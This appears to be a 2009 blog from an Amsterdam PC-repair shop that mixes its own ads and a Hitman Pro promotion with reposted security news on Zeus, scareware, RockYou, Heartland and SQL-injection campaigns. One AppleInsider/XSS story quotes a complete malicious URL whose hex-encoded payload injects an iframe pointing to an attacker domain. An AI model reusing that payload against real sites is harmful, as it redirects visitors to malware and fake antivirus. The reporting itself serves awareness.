Tuesday, 29 December 2009

Zeus Bot Removal

To clean yourself of Zeus, please contact us at iremove.nl

Saturday, 26 December 2009

iRemove Sales Page. Operating Systems List

Click Here To be Directed to A price list of Operating systems

Opening Day Special.
Merry Christmas

FIRST DAY OPENING TODAY !!

**NOW OPEN** PC Repair Amsterdam iRemove.nl , Virus & Malware Removal

NOW OPEN!!

Merry Christmas,
From today iRemove Amsterdam is fully active. Come visit us

http://iremove.nl

PC Repair Amsterdam, Virus & Malware Removal, Online Discount Antivirus/Antispam Programs , Fresh installations of Various Operating Systems, including Windows 7 All Verions.

Advanced Online Protection Tutuorials

Remote Assistance

Contact us for information on easy upgrade from home, very cheap & fast service. All Versions of Microsfot Platforms available.

Free Travel costs (Amsterdam) & Online Diagnostics .



infected@iremove.nl

Thursday, 17 December 2009

Texas company lays out 'hacking' case against Minnesota Public Radio

By David Brauer
minnpost.com
Dec 15 2009

Do Minnesota Public Radio and reporter Sasha Aslanian realistically face
civil and criminal penalties after uncovering a Texas firm’s security
breaches involving state of Minnesota job-seeker data?

Lookout Services - which acknowledges an October security breach and
subsequent security weaknesses - claimed in a Dec. 14 statement that
their data was "illegally compromised." The company - which notes "only
the Minnesota Public Radio reporter viewed" some data and wants MPR to
disclose what was viewed - will "aggressively seek prosecution for this
egregious act," according to the statement.

In a Dec. 11 report, Aslanian said she was able to see "employee names,
birth dates, Social Security numbers and hire dates" on Lookout's web
site "without using a password or encryption software."

Lookout CEO Elaine Morley says that’s not the whole truth. She contends
Aslanian did use a password and ID to penetrate Lookout's security - and
told Morley so during a Dec. 7 phone call. Later, Morley asserts,
Aslanian used information from that penetration to view the state data,
even though she didn’t need a password or encryption that time.

Spymaster sees Israel as world cyberwar leader

By Dan Williams
TEL AVIV
Reuters
Dec 15, 2009

TEL AVIV (Reuters) - Israel is using its civilian technological advances
to enhance cyberwarfare capabilities, the senior Israeli spymaster said
on Tuesday in a rare public disclosure about the secret program.

Using computer networks for espionage -- by hacking into databases -- or
to carry out sabotage through so-called "malicious software" planted in
sensitive control systems has been quietly weighed in Israel against
arch-foes like Iran.

In a policy address, Major-General Amos Yadlin, chief of military
intelligence, listed vulnerability to hacking among national threats
that also included the Iranian nuclear project, Syria and Islamist
guerrillas along the Jewish state's borders.

Yadlin said Israeli armed forces had the means to provide network
security and launch cyber attacks of their own.

"I would like to point out in this esteemed forum that the cyberwarfare
field fits well with the state of Israel's defense doctrine," he told
the Institute for National Security Studies (INSS), a Tel Aviv
University think tank.

Five things you need to know about Social Engineering

By Robert McMillan
IDG News Service
December 16, 2009

SOCIAL ENGINEERING IS GROWING UP. Social engineering, the act of
tricking people into giving up sensitive information, is nothing new.
Convicted hacker Kevin Mitnick made a name for himself by cold-calling
staffers at major U.S. companies and talking them into giving him
information. But today's criminals are having a heyday using e-mail and
social networks. A well-written phishing message or virus-laden spam
campaign is a cheap, effective way for criminals to get the data they
need.

TARGETED ATTACKS ARE ON THE RISE. Northrop Grumman recently reported
that China was "likely" stealing data from the United States in a "long-
term, sophisticated network exploitation campaign." Security experts
have noticed criminals were "spear phishing"--getting Trojan horse
programs to run on a victim's computer by using carefully crafted e-mail
messages. Used to steal intellectual property and state secrets, spear
phishing is now everywhere.

CASTING A BROAD NET PAYS OFF TOO. Less discriminating criminals cast a
wider net with their attacks. They pick e-mail subjects everybody's
interested in: a message from the IRS, or even "a photo of you." The
more victims who click links and install the bad guy's software, the
more money the criminals make. Right now, "they're doing it with
messaging that is extremely broad," says Gary Warner, director of
research in computer forensics at the University of Alabama at
Birmingham.
FREE STUFF CAN BE COSTLY. Attackers love to tempt people with freebies, security experts say. "The bait that works best is a popular device," says Sherri Davidoff, a penetration tester hired to see if she can break into corporate networks. One of Davidoff's most successful techniques: a fake employee survey. Victims fill it out thinking they'll qualify to win an iPod if they hand over sensitive information. "Thirty to 35 percent will enter their usernames and passwords to get the iPhone," she says.

PEOPLE TRUST THEIR (HACKED) FRIENDS. That trust allowed the Koobface worm to spread throughout Facebook and led to a rash of direct-message attacks on Twitter too. It's all part of the next round of socially-engineered attacks, says Steve Santorelli, formerly a Scotland Yard detective and now director of global outreach at Team Cymru. A few years ago hackers were more focused on the quality of their code. Now, he says, "they are putting an equal effort into social engineering."

Botnet Operators Infecting Servers, Not Just PCs

By Kelly Jackson Higgins
DarkReading
Dec 16, 2009

Botnet operators have always been able to easily infect and convert PCs
into bots, but they also are increasingly going after servers -- even
building networks of compromised servers.

Web servers, FTP servers, and even SSL servers are becoming prime
targets for botnet operators, not as command and control servers or as
pure zombies, but more as a place to host their malicious code and
files, or in some cases to execute high-powered spam runs.

"FTP servers are a hot commodity in the underground. They are regularly
used by drive-by download malware as well as a downloading component for
regular bots," says Mikko Hypponen, chief research officer at F-Secure.
"Another thing we've noticed is the use of SSL servers. Sites with a
valid SSL certificate get hacked and are used by drive-by-downloads."

Why SSL servers? "If a drive-by download gets the malware file through
an HTTPS connection, proxy and gateway scanners won't be able to scan
for the malware in transit, making it easier to sneak in," Hypponen
explains.

Wednesday, 16 December 2009

Attacks spread malware with help from AppleInsider

Malware purveyors are exploiting web vulnerabilities in appleinsider.com, lawyer.com, news.com.au and a dozen other sites to foist rogue anti-virus on unsuspecting netizens.

The ongoing attacks are notable because they use exploits based on XSS, or cross-site scripting, to hide malware links inside the URLs of trusted sites. That's something application security expert Mike Geide doesn't see often. As a result, people who expect to visit sites they know and trust are connected to a page that tries to trick them into thinking their computer is infected.

"What's interesting ... is the fact that it's embedding iframes to redirect people," Geide, who is a senior security researcher at Zscaler, told The Register. "Typically, cross-site scripting is just that - it embeds script tags so it will embed javascript to run."

The malicious links are blasted out on web forums and typically look something like:

hxxp://lawyers.com/find_a_lawyer/content_search/results.php?sCHRISTINA%AGUILERA%20ANOREXIC%20PICS%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

The last chunk of test is hexadecimal-encoded HTML that redirects users to ask5 .eu (a space has been added for your protection). A series of redirect links ultimately leads to a site that looks similar to a Microsoft Windows screen with a popup claiming the PC is overrun with malware. The user is prompted to download rogue anti-virus to fix the imaginary problem.

While it's not the most convincing attack we've ever seen, there's nothing to stop attackers from using the same technique to push web-based exploits, say the Adobe Reader zero-day attack that's now circulating in the wild.

The links work because appleinsider.com and the rest of the sites being abused fail to filter out harmful characters used in XSS attacks.

More about the attack is available from the Zscaler blog here

One Of The 32 Million With A RockYou Account? You May Want To Change All Your Passwords. Like Now.

By MG Siegler
TechCrunch.com
December 14, 2009

It's no secret that most people use the same password over and over
again for most of the services they sign up for. While it's obviously
convenient, this becomes a major problem if one of those services is
compromised. And that looks to be the case with RockYou, the social
network app maker.

Over the weekend, the security firm Imperva issued a warning to RockYou
that there was a serious SQL Injection flaw in their database. Such a
flaw could grant hackers access to the the service's entire list of user
names and passwords in the database, they warned. Imperva said that
after it notified RockYou about the flaw, it was apparently fixed over
the weekend. But that's not before at least one hacker gained access to
what they claim is all of the 32 million accounts. 32,603,388 to be
exact. The best part? The database included a full list of unprotected
plain text passwords. And email addresses. Wow.

The hacker has posted a sample of what they found. They have blanked out
the passwords for now, but warns, "Don't lie to your customers, or i
will publish everything." As far as we can tell, RockYou hasn't issued a
warning about this to its users yet. We've reached out to the company,
but have yet to hear back.

Not another Stolen Laptop

BBC News
12 December 2009

An investigation is under way after a laptop containing secret data was
stolen from the Ministry of Defence.

It was taken from the ministry's headquarters in Whitehall, central
London in late November, along with a key used to decode encrypted
files.

A spokesman said an investigation by MoD police was ongoing.

Shadow defence cecretary Liam Fox said the theft was "extremely
worrying". The incident is the latest in a string of thefts involving
MoD laptops.

Figures from the department earlier this year showed that 28 had been
lost or stolen between 1 January and 11 May.

And last July, the MoD admitted that 658 of its laptops had been stolen
in the past four years.

Bank's antifraud tactics stun security expert: How much do they know?

By Ellen Messmer
Network World
12/14/2009

Checking out of a Hilton hotel in London, security expert Roger Thompson
was told his Visa card had been declined due to suspicions it was
stolen, a situation that only got more disconcerting when he learned the
bank that issued the card had more personal information on him and his
family members than he ever imagined.

In a tale he relates in his blog, Thompson, chief research officer at
AVG, said he was compelled to answer questions on the phone from a
Wachovia Bank representative in its fraud-prevention division to prove
he was really Roger Thompson and not a credit-card thief checking out of
the London hotel. Mitigating Litigation Risk with Email Management
Tools: Download now

It turns out Thompson's Visa card was flagged and suspended because he
hadn't told the bank he was travelling overseas, a requirement he didn't
know the bank had. But the "scary bit" about it all, he says, is that
the bank fraud-prevention representative didn't just ask him to give the
correct answers to questions such as his mother's maiden name, which he
had provided to the bank for fraud detection purposes, but also a host
of other questions about his daughter-in-law that he had no idea it
knew.

"I was in shock," Thompson says about what he found out that Wachovia
Bank had stored "at their fingertips" related to his daughter-in-law --
information Thompson thinks the bank may have found out through
Facebook.

Monday, 14 December 2009

Get your HitmanPro Here. **NEW ANTIVIRUS SOFTWARE**

http://www.surfright.nl/en/shop?rc=9599818

Hitman Pro Available Through iRemove Amsterdam

32% of Computers Still Infected, Despite Presence of Antivirus Program

Hengelo, December 9, 2009. Computer users assume that the popular antivirus programs will protect them against malware (viruses, spyware, Trojans, etc). But our research shows this is not correct. Over 100,000 computers were scanned using our award-winning product, Hitman Pro 3, and almost 32% of the users that have an up-to-date antivirus program installed is still infected with malware.

"Our research shows that traditional antivirus programs cannot keep up with the cyber criminals", according to CEO Mark Loman. "Despite all their efforts, suppliers of antivirus programs release a solution days, sometimes weeks, after a new malware instance is released."

Mark Loman continues: "Our research also shows that not all antivirus programs detect the same threats. A combination of different antivirus programs would reduce the number of infections dramatically. This security strategy is already used successfully at the enterprise level, but has been difficult to implement for home users due to the increased resource requirements needed to run multiple antivirus programs and conflicts between different antivirus programs, both of which can adversely affect computer performance."

Hitman Pro 3 allows home users to use the detection and removal capabilities of multiple antivirus programs incorporated into one seamless solution, because the 7 antivirus programs are available via Internet (the Scan Cloud).
Research Results

107,435 computer users have used the free version of Hitman Pro 3 for the first time in the period from October 10 to December 4.
78,828 users had an up-to-date antivirus program installed. 28,607 users had not.
25,038 (32%) of the 78,828 users with up-to-date antivirus program were infected with malware.
13,002 (46%) of the 28,607 users without up-to-date antivirus program were infected with malware.

These 107,435 users have scanned their computer using the Behavioural Scan in Hitman Pro 3. All potential malware instances were submitted to the SurfRight Scan Cloud for further analysis. All of these malware samples were gathered in the period from October 10 to December 4 (55 days) in order to reflect actual malware samples "in the wild" and not a collection of "old" malware examples.
Top 10 of found malware
Rank Malware Infected
Computers
1. Generic 34,845
2. FakeAV 13,050
3. Alureon 5,915
4. Delf 4,116
5. Virut 2,868
6. Vundo 2,421
7. Small 2,342
8. OneStep 2,093
9. OnLineGames 1,946
10. Swizzor 1,854

The large number of generics is an indication that AV vendors are trailing behind in releasing signatures to detect new variants of malware. For example: The TDSS rootkit is in the top 3 of malware that Hitman Pro 3 detected last month. We received the first sample of TDSS/Alureon rootkit from a victim’s machine in our Scan Cloud on October 30, 2008. More than one year later, this particular rootkit sample still beats every major AV product.
Research Results

* It is not sufficient to assume you are protected if you have an antivirus program on your PC. Scan your PC regularly with a product from a different vendor for a second opinion.
* Do not simply extend the subscription of your antivirus program when it expires. In most cases it is better to upgrade to the latest version, as newer versions are in general better equipped to battle the newest sophisticated threats.
* Although vendors of antivirus programs are able to detect sophisticated threats, not all are able to remove it completely.

Click here for a detailed description of the research results and the methodology.
Hitman Pro 3

Hitman Pro 3 can scan a computer in only a few minutes from a USB Flash Drive, CD/DVD, local or network attached hard drive and will quickly reveal the presence of any malware using a Behavioural Scan. The actual verification of these potential malware files is then done on the Hitman Pro servers, the "Scan Cloud", which incorporates a hosted multi-vendor scanning service. Hitman Pro 3 uses 7 different antivirus programs to analyse the suspicious files.

Hitman Pro 3 can be used in addition to your existing antivirus program. Scanning your PC is free so Hitman Pro 3 is an ideal solution to check if your current antivirus program is protecting you sufficiently. A free version can be downloaded from www.hitmanpro.com
About SurfRight

SurfRight B.V. was founded in 2008, based on the freeware project Hitman Pro 1 and 2 with a user base of more than 3 million users. SurfRight is dedicated to the development of smart, efficient and user-friendly security solutions for the average computer user. Hitman Pro 3 and the Caretaker product family include solutions against unsolicited mail (spam), online fraud (phishing), viruses and other malware.

Stolen bank data mixed into list of French tax dodgers

By John Leyden
The Register
11th December 2009

The legality of a French crackdown on suspected tax evaders earlier this
year has been thrown into doubt after it emerged that stolen data was
among the mix of information used by financial investigators.

A list of 3,000 French nationals suspected of using Swiss banking
secrecy to evade paying taxes included data handed over by a former IT
worker for HSBC in Switzerland - without the bank's permission - to the
French authorities.

In a statement, HSBC in Switzerland confirmed a worker suspected of
stealing information from the bank between 2006 and 2007 was prosecuted
last year. The data involved less than 10 accounts held by Geneva-based
HSBC Private Bank, according to HSBC. It's unclear whether the unnamed
worker involved was convicted of any offence. French daily Le Parisien
reports that the former bank staffer has fled to France and is living
under judicial protection.

French daily Le Figaro claimed on Friday that up to 4,000 French clients
of the bank, collectively holding €6 billion ($8.8 billion) in assets in
Switzerland, were named on the stolen list. Only an unspecified
proportion of those named on the list (which sounds like a data dump,
perhaps indexed by a residential address in France) are suspected of tax
evasion.

Digital dangers in a wired world

By Lim Mi-jin, Kim Jeen-kyung
JoongAng Daily
December 14, 2009

It's the stuff of action flicks. In "Live Free or Die Hard," terrorists
paralyze the United States by taking over all transportation systems,
broadcasting, communications and the power grid. It’s a total shutdown
and only Bruce Willis can save the world from the evil hackers.

But the plot’s not a total fiction.

In today’s interconnected world, system after system can collapse if a
central computing facility such as a supervisory control and data
acquisition, or Scada, system fails. These Scada collect data from
sensors at plants and other remote locations and then send data to a
central computer that manages and controls data.

So what we saw in the last Die Hard movie has actually already been
experienced. Ask the Poles. In January last year, a subway train
derailed in Lodz injuring several passengers after a 14-year-old boy
hacked into the railway operation system. And look at what happened in
the United States in August 2003 when a virus called a "Blaster Worm"
found its way into the Scada for the power grid in the northeast of the
U.S. Around 5,000 people in seven states were injured in the ensuing
blackout. "Once you hack into the Scada, you can manipulate all the
water, electricity and gas supply systems," said Park Chan-am, 20, the
winner of a hacking protection competition held in Korea this year, part
of Codegate 2009, an international event.

Korea has already installed Scada systems in most facilities across the
country. These facilities control everything from reserving train
tickets to supplying electricity and air-conditioning. They even control
the floodgates of multipurpose dams and the quality of tap water in
Seoul.

And we have seen what can happen when things go wrong. On Nov. 27, the
electric power in the Korea Railroad Corporation building in
Bongnae-dong, central Seoul, went off at 5:21 p.m. Within a minute,
Korail had supplied emergency electric power but all systems for issuing
train tickets nationwide were halted for nearly two hours because the
computer server managing train ticket reservations and issuance that was
installed in the Korail building malfunctioned.

The situation was not life threatening but it caused a major
inconvenience for passengers trying to buy tickets.

Korea's largest Scada system in scale is Korea Electric Power
Corporation’s "smart grid," which will be test run from 2011. The system
will have sensors and cameras installed in existing power plants and
power grids. Those sensors and cameras are going to allow Scada to
control the volume of regional power supply and demand. In that way, the
proper amount of electricity is expected to be provided to each region
at that right time.

Experts say this measure could save energy but electric power supply
operation across the country could be paralyzed if the Scada is
compromised. "It is almost impossible to hack into the smart grid system
because it is operated by a remote Internet network and it has advanced
security facilities attached," said an official at Kepco who asked not
to be identified.

However, experts in the security industry said the system could be
breached. Security experts say safeguard measures have to be included in
a law related to the establishment of the smart grid. They cite the
example of an employee from a company in charge of disposing garbage
penetrated the Scada and released a large amount of waste in a river in
Queens-land, Australia. Apparently he had a grudge against the local
council.

"Terrible damage, such as a large-scale power blackout, is highly likely
if the system is attacked by hackers," said Lim Jong-in, a professor at
Korea University’s Graduate School of Information Management and
Security. "The planned bill has to be revised in order to arrange for a
high security budget and secure human resources."

New version of 20 top security controls is available

By William Jackson
GCN.com
Dec 10, 2009

Version 2.3 of the Consensus Audit Guidelines, the top 20 critical
security controls agreed on by a consortium of private and government
security experts, has been released and is available on the Web site of
the SANS Institute.

The consortium includes the National Security Agency, the U.S. Computer
Emergency Readiness Team, and agencies from the departments of Defense,
State and Energy, in addition to commercial forensics experts and white
hat hackers. The controls are intended to help large enterprises
prioritize and automate efforts to block known attacks and identify
intrusions. They include 15 automated controls and five additional
controls that cannot be automated to the same degree.

Call for papers i-Society 2010

CALL FOR PAPERS

*******************************************************************
International Conference on Information Society (i-Society 2010),
Technically Co-Sponsored by IEEE UK/RI Computer Chapter
28-30 June, 2010, London, UK
www.i-society.eu
*******************************************************************

The International Conference on Information Society (i-Society 2010) is
Technically Co-Sponsored by IEEE UK/RI Computer Chapter. The i-Society
is a global knowledge-enriched collaborative effort that has its roots
from both academia and industry. The conference covers a wide spectrum
of topics that relate to information society, which includes technical
and non-technical research areas.

The mission of i-Society 2010 conference is to provide opportunities for
collaboration of professionals and researchers to share existing and
generate new knowledge in the field of information society. The
conference encapsulates the concept of interdisciplinary science that
studies the societal and technological dimensions of knowledge evolution
in digital society. The i-Society bridges the gap between academia and
industry with regards to research collaboration and awareness of current
development in secure information management in the digital society.

The topics in i-Society 2010 include but are not confined to the
following areas:

*New enabling technologies
- Internet technologies
- Wireless applications
- Mobile Applications
- Multimedia Applications
- Protocols and Standards
- Ubiquitous Computing
- Virtual Reality
- Human Computer Interaction
- Geographic information systems
- e-Manufacturing

*Intelligent data management
- Intelligent Agents
- Intelligent Systems
- Intelligent Organisations
- Content Development
- Data Mining
- e-Publishing and Digital Libraries
- Information Search and Retrieval
- Knowledge Management
- e-Intelligence
- Knowledge networks

*Secure Technologies
- Internet security
- Web services and performance
- Secure transactions
- Cryptography
- Payment systems
- Secure Protocols
- e-Privacy
- e-Trust
- e-Risk
- Cyber law
- Forensics
- Information assurance
- Mobile social networks
- Peer-to-peer social networks
- Sensor networks and social sensing

*e-Learning
- Collaborative Learning
- Curriculum Content Design and Development
- Delivery Systems and Environments
- Educational Systems Design
- e-Learning Organisational Issues
- Evaluation and Assessment
- Virtual Learning Environments and Issues
- Web-based Learning Communities
- e-Learning Tools
- e-Education

*e-Society
- Global Trends
- Social Inclusion
- Intellectual Property Rights
- Social Infonomics
- Computer-Mediated Communication
- Social and Organisational Aspects
- Globalisation and developmental IT
- Social Software

*e-Health
- Data Security Issues
- e-Health Policy and Practice
- e-Healthcare Strategies and Provision
- Medical Research Ethics
- Patient Privacy and Confidentiality
- e-Medicine

*e-Governance
- Democracy and the Citizen
- e-Administration
- Policy Issues
- Virtual Communities

*e-Business
- Digital Economies
- Knowledge economy
- eProcurement
- National and International Economies
- e-Business Ontologies and Models
- Digital Goods and Services
- e-Commerce Application Fields
- e-Commerce Economics
- e-Commerce Services
- Electronic Service Delivery
- e-Marketing
- Online Auctions and Technologies
- Virtual Organisations
- Teleworking
- Applied e-Business
- Electronic Data Interchange (EDI)

*e-Art
- Legal Issues
- Patents
- Enabling technologies and tools

*e-Science
- Natural sciences in digital society
- Biometrics
- Bioinformatics
- Collaborative research

*Industrial developments
- Trends in learning
- Applied research
- Cutting-edge technologies

* Research in progress
- Ongoing research from undergraduates, graduates/postgraduates and
professionals

Important Dates:
Paper Submission Date: January 31, 2010
Notification of Paper Acceptance / Rejection: February 28, 2010
Camera Ready Paper Due: March 15, 2010
Early Bird Attendee registration: January 01, 2010
Late Bird Attendee registration: February 28, 2010
Conference Dates: June 28-30, 2010

For more details, please visit www.i-society.eu

Heartland Executives Told the Truth, Judge Says

By Robert McMillan
IDG News Service
Dec 10, 2009

Top executives at Heartland Payment Systems spoke truthfully about the
state of security at the company, a federal judge said earlier this week
before dismissing a class-action lawsuit against the payment processor.

The shareholder lawsuit, filed in March, was dismissed Monday by Judge
Anne Thompson of the U.S. District Court for the District of New Jersey.

Heartland was sued by shareholders after its stock dropped nearly 80
percent following the largest data breach in U.S. history. The
plaintiffs in the case say that Heartland executives lied when asked
about the state of the company's security in earnings conference calls
and by failing to disclose a 2007 SQL injection attack on its payroll
system in Securities and Exchange Commission filings.

That December 2007 SQL injection attack was important because it gave
criminals a back door into the company's payment processing system, the
plaintiffs alleged. Ultimately hackers stole more than 130 million
credit card numbers.

But in her opinion, Judge Thompson said that because Heartland had not
confirmed the credit card hack until January 2009, the company's
executives were telling the truth when they told investors that they
took security seriously.

Thursday, 10 December 2009

Scareware Fake MS endorsement

Scareware wronguns have developed a neat but evil piece of coding trickery designed to dupe prospective marks into believing that Microsoft is endorsing their worthless scamware.

A rogue anti-malware product called DefenceLab redirects infected PCs to Microsoft's Support portal, but modifies the HTML content as it returns so as to appear as if Microsoft is endorsing the worthless software. The ploy, which follows a fake scan and bogus Windows Security Center alert, is designed to persuade Windows users already exposed to infection by agents of the scareware package to pay for a full version of the supposed clean-up utility.

Surfers visiting the URL on the Windows Support site referenced in the scareware from a clean PC will get a 404 'page not found' message. Hacked PC victims will see an apparent endorsement.

Screenshots of the attack in action can be found in a blog post by anti-spyware firm Sunbelt Software, which was the first to warn of the threat, here.

The ruse is a development of earlier trickery that involved hacking the hosts' file on compromised computers in order to hijack web surfing sessions. An earlier attack using this technique redirected Microsoft queries to a hacked UK-based computer, as explained in a blog posting by AVG's Roger Thompson here

Prevx U-turn

Updated PrevX has backtracked on earlier claims that a Windows update caused Windows machines to lock up with a so-called "Black Screen of Death".

An updated blog post from the UK-based software security firm withdraws earlier claims that a recent Microsoft update caused a glitch that resulted in affected PCs displaying only the My Computer folder on a blank screen. PrevX's new line is that changes in the Windows Registry that trigger the behaviour might be caused by malware or some other factor, which it is yet to pin down, but not the Windows update that it earlier held culpable.

Having narrowed down a specific trigger for this condition we've done quite a bit of testing and re-testing on the recent Windows patches including KB976098 and KB915597 as referred to in our previous blog. Since more specifically narrowing down the cause we have been able to exonerate these patches from being a contributory factor.

PrevX apologised for earlier pointing the finger of blame towards Redmond, adding that whatever the cause of the problem it has a fix.

We apologize to Microsoft for any inconvenience our blog may have caused. This has been a challenging issue to identify. Users who have the black screen issue referred to can still safely use our free fix tool to restore their desktop icons and task bar.

A blog posting by Microsoft Security Response, about research in Redmond that appears to have contributed to PrevX's volte-face, clearly states that the "Black Screen" reported by PrevX was not caused by Microsoft's updates.

We’ve conducted a comprehensive review of the November Security Updates, the Windows Malicious Software Removal Tool, and the non-security updates we released through Windows Update in November. That investigation has shown that none of these updates make any changes to the permissions in the registry. Thus, we don’t believe the updates are related to the "black screen" behaviour described in these reports.

Redmond adds that it hadn't received many reports of users getting clobbered by the problem, adding that previous instances of "black screen" behaviour have been associated with some malware families such as Daonol.

PrevX wasn't able to supply a screengrab illustrating the latest outbreak of "black screen" lock-ups in response to our request on Wednesday morning. PrevX's initial warning about the "Black Screen of Death" was widely reported by El Reg and many other media outlets, however it's unclear how many people have actually been affected.

No other security firm we're aware of bar PrevX has issued and advisory on the issue and several others have privately expressed skepticism about a least the extent of the problem. ®
Update

In an updated blog post on Tuesday, PrevX fought back against suggestions that it had overstated the scope of the Black Screen of Death glitch. Mel Morris, PrevX chief exec, said it's free Black Screen fix tool had been downloaded more than 50,000 downloads times since its publication last Friday.

Morris also criticised the media for misinterpreting PrevX's original warning by taking material out of context and causing "inconvenience for Microsoft".

However PrevX's original advisory is pretty clear is pointing blame towards recent Microsoft patches, KB915597 and KB976098, now ruled as blameless. Malware or problems between Windows and third-party software don't get a mention.

Default Windows 7 less secure than Vista

Windows 7 is less secure out-of-the box than Vista, despite Redmond's protestations to the contrary, a top security firm has claimed.

Trend Micro said that the default configurations of Windows 7 are less secure than Vista. Raimund Genes, CTO of Trend Micro, said that Windows 7 had sacrificed security for useability - at least for default configurations.

"I'm not saying Windows 7 is insecure, but out of the box Vista is better," Genes told El Reg.

The User Account Control (UAC) feature that debuted with Vista was a security safeguard that asked users for permission before allowing applications to run. The nagware technology irked users and was blamed for producing numerous largely meaningless pop-ups that users blithely clicked past.

Even senior Microsoft execs, for example UK security advisor Ed Gibson, have taken to describing the technology disparagingly as "User Annoyance Control" over recent months. A toned down version of UAC has been developed for Windows 7, but Genes regards this and other changes as a step backwards.

"I was disappointed when I first used a Windows 7 machine that there was no warning that I had no anti-virus, unlike Vista," Genes said. "There are no file extension hidden warnings either. Even when you do install anti-virus, warnings that it has not been updated are almost invisible."

"Windows 7 may be an improvement in terms of useability but in terms of security it's a mistake, though one that isn't that surprising. When Microsoft's developers choose between usability and security, they will always choose useability," Genes argued.

Genes said the security of Windows 7 for consumers might be improved by offering virtual XP, a sandboxed version of the older OS, with Windows 7 home editions. The virtualisation technology (criticised by other security firms, most notable Sophos, as a security risk in its own right because it needs separate patching and security protection) was only released in enterprise versions of the operating system.

Trend's unfavorable default security comparison between Vista and Windows 7 was released alongside its Trend Micro 2010 Future Threat Report. The main focus of the report places the security implication of the wider IT industry shift towards cloud computing and virtualisation under the spotlight.

While offering significant benefits and cost-savings, the architectural shift means cybercrooks are likely to turn their sights towards manipulating the connection to the cloud, or attacking the data center and cloud itself, instead of trying to infect desktop or server systems.

"The focus for security firms has been protecting desktops or servers, but this needs to shift to providing security for the cloud, where sensitive information such as credit card records will be held. Using encryption to establish shielded containers for sensitive data and improving the security and back-up of cloud computing systems needs to be improved so that we can have safe cloud computing," Genes explained

Zeus bot found using Amazon's EC2 as C&C server

Add Amazon's EC2 to the roster of cloud-based services being exploited to do the bidding of malware gangs.

Over the past few days, a new variant of the Zeus banking trojan has been spotted using the popular Amazon service as a command and control channel for infected machines. After marks get tricked into installing the password-logging malware, their machines began reporting to EC2 for new instructions and updates, according to researchers from CA's internet security business unit.

"We believe this was a legitimate service that was purchased and compromised via a vulnerability" such as a weak password, Don DeBolt, CA's director of threat research, told The Reg. "It could have been any vulnerable system on the internet."

Over the past few months, accounts on Twitter, Google's app engine, and Facebook have also been transformed into master control channels for machines under the spell of surreptitious malware. In addition to their high availability and low cost, the sites are attractive because they don't set off alarms when infected machines are observed connecting to them.

While it's relatively easy to block channels located in China or based on internet relay chat, blacklisting some of the world's most popular online destinations is another matter completely.

According to analysis from Zero Day blogger Dancho Danchev, the cybercriminals behind Zeus appear to have plugged into Amazon's Relational Database Service as a backend alternative in case they lose access to their original domain.

DeBolt said the EC2 channel was disconnected after it was brought to the attention of Amazon officials. People who want to report future abuse of cloud-based services offered by the online retailer can use this link. An Amazon spokeswoman didn't respond to an email requesting comment. ®

Potent malware link infects almost 300,000 webpages

A security researcher has identified a new attack that has infected almost 300,000 webpages with links that direct visitors to a potent cocktail of malicious exploits.

The SQL injection attacks started in late November and appear to be the work of a relatively new malware gang, said Mary Landesman, a researcher with ScanSafe, a web security firm recently acquired by Cisco Systems. Hacked sites contain an invisible iframe that silently redirects users to 318x .com (a space has been added to protect the clueless), which goes on to exploit known vulnerabilities in at least five applications.

At time of writing, this web search showed more than 294,000 webpages that contained the malicious script. Infected sites included yementimes .com, parisattitude .com and knowledgespeak .com.

People who visit infected pages receive an invisible link that pulls code from a series of sites tied to 318x .com. The code looks for insecure versions of Adobe Flash, Internet Explorer, and several other Microsoft applications, and when they are detected it exploits them to surreptitiously install malware known as Backdoor.Win3.Buzus.croo. The rootkit-enabled program logs banking credentials and may do other nefarious bidding, Landesman said.

At the moment, about two percent of the requests ScanSafe sees are for sites infected by the malicious link, an indication the threat is significant, Landesman said.

SQL injection attacks prey on web applications that fail to adequately inspect user supplied input before passing it off to a webserver's backend database. They are a favorite way of adding malicious links and content to third-party websites and were also the the chink that allowed Albert Gonzalez and other hackers the toehold they needed to steal more than 130 million credit card numbers from card processor Heartland Payment Systems and four other companies.

The fingerprints on this latest attack lead Landesman to believe the perpetrators are new to the SQL injection game. More sophisticated mass attacks using the method, such as the Gumblar infection inject unique, dynamically-generated links that prevent researchers from being able to locate them using web searches.

Gumblar also uploads exploits directly to infected sites, which greatly complicates white hat efforts to clean up the mess. Rather than shutting down a single site that's hosting the malware, thousands of mom and pop sites must be disinfected one at a time.

"I'm not convinced SQL injection is the method they're most accustomed to," Landesman said of the gang behind the most recent mass infection. "It's almost as if they're a seasoned attacker but this is their first foray into managing a wide-scale web attack.

Wednesday, 9 December 2009

Hackers Target Webmasters cpanel login Phish

Fraudsters are targeting webmasters in a massive phishing campaign that attempts to trick marks into giving up credentials needed to administer their sites.

The emails are sent to customers of some of the world's most widely used webhosts, including GoDaddy, Hostgator, Yahoo!, and 50Webs. Although the subject lines vary, they all purport to come from the hosting service. In all, admins from at least 90 different webhosts are being targeted.

"Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details," the emails state.

Those who take the bait are led to a website formatted to look like a page from cPanel, the widely used website administration program. Once a website's address and FTP credentials are entered, users are directed to their host's login page.

Over the past year, scammers have increasingly targeted administrators of legitimate websites. According to a review in the third quarter of this year by security firm Dasient, 5.8 million pages from 640,000 websites were infected with code designed to launch malware attacks on visitors. ScanSafe, a separate security firm, has been tracking a single infection known as Gumblar that's taken over at least 2,000 websites by stealing their administrator credentials.

The latest phishing campaign was uncovered by Gary Warner, the director of research in computer forensics at the University of Alabama at Birmingham. It's unclear if it has any relation to Gumblar or what exactly happens to a site whose admin has fallen for the scam. His report is here

Avasts Human error!

Popular free of charge anti-virus scanner Avast went berserk late last week and began classifying legitimate files as infected.

Legitimate products were wrongly classified as harbouring the Dell-MZG Trojan or other strains of malware and whisked off to quarantine following the publication of a dodgy update. Avast has published a new update that eliminates the wrongful classification glitch. However, that still leaves users who applied the earlier update with borked systems.

False positives are a well known shortcoming of anti-malware scanners. Avast's snafu last Thursday was only unusual because it classified a large number of legitimate programmes as malign. Software from Adobe, Realtek sound card drivers and various media players were all affected.

Avast has published an apology for the cock-up and advice on restoring systems in a blog post (here) and its forum (here).

The anti-virus firm blamed "human error" for the mix-up.

Adware touts $1 bribe to prospective zombies

An adware distributor is offering to pay punters $1 to install their crud.

The bribe comes attached to malware, specifically an application bundle that includes adware and agents that change browser home pages, detected by Sunbelt Software as C4DLMedia and classified as a medium risk threat. The offer of payment is buried in the application's terms and conditions.

